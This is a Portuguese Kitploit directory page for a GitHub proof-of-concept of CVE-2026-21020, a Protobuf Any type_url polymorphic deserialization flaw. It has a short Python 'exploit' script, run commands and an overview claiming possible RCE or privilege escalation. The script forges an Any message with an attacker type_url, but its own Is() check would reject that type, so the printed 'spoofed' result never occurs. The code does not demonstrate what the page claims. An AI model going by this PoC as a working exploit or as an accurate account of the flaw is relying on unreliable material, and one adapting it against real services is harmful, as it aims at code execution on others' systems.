Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability — PoC para CVE-2026-21020, demonstrando desserialização polimórfica do tipo Any do Protobuf, onde o type_url controlado pelo atacante pode levar a bugs de lógica, RCE ou escalonamento de privilégios. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de API
GitHubgeorge0papasotiriou/cve-2026-21020-protobuf-message-parsing-polymorphic-deserialization-vulnerability

CVE-2026-21020-Protobuf-Message-Parsing-Polymorphic-Deserialization-Vulnerability

PoC para CVE-2026-21020, demonstrando desserialização polimórfica do tipo Any do Protobuf, onde o type_url controlado pelo atacante pode levar a bugs de lógica, RCE ou escalonamento de privilégios.

Ver Repositório
2há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-21020 – Vulnerabilidade de Desserialização Polimórfica no Parsing de Mensagens Protobuf

Código do Programa (Python com protobuf)

root@kitploit:~
# proto_vuln.py - Insecure handling of Any type
import addressbook_pb2  # Example protobuf

# Simulated deserialization that trusts an injected type_url
from google.protobuf import any_pb2

any_msg = any_pb2.Any()
any_msg.type_url = "type.googleapis.com/attacker.Evil"
any_msg.value = b'\x0a\x05admin'  # serialized payload

# Application unpacks to expected type but could instantiate arbitrary class if using dynamic loading
if any_msg.Is(addressbook_pb2.Person.DESCRIPTOR):
    person = addressbook_pb2.Person()
    any_msg.Unpack(person)
    print("Person unpacked, but type_url was spoofed!")

CVE-2026-21020 – Desserialização Polimórfica de Protobuf via Any

Severity: Critical

Visão Geral

Um serviço usa o tipo Any do Protocol Buffers para encapsular mensagens e as desempacota dinamicamente usando o campo type_url sem validar o tipo esperado. Um atacante pode enviar uma mensagem com um type_url malicioso que aponta para uma classe de mensagem perigosa (ou não intencional), causando falhas de lógica ou execução de código.

Detalhes da Vulnerabilidade

  • Tipo: Desserialização de Dados Não Confiáveis / Confusão de Tipos
  • Impacto: Potencial RCE ou escalada de privilégios.
  • Causa Raiz: O servidor desserializa o payload com base no type_url controlado pelo atacante, sem usar uma lista de permissões (whitelist).

Demonstração do Exploit

Execute a simulação:

root@kitploit:~
pip install protobuf
python proto_vuln.py

Isso mostra que o tipo Any pode ser falsificado; se o código carregar dinamicamente a classe a partir de type_url, isso pode levar a RCE.

Baixar ferramenta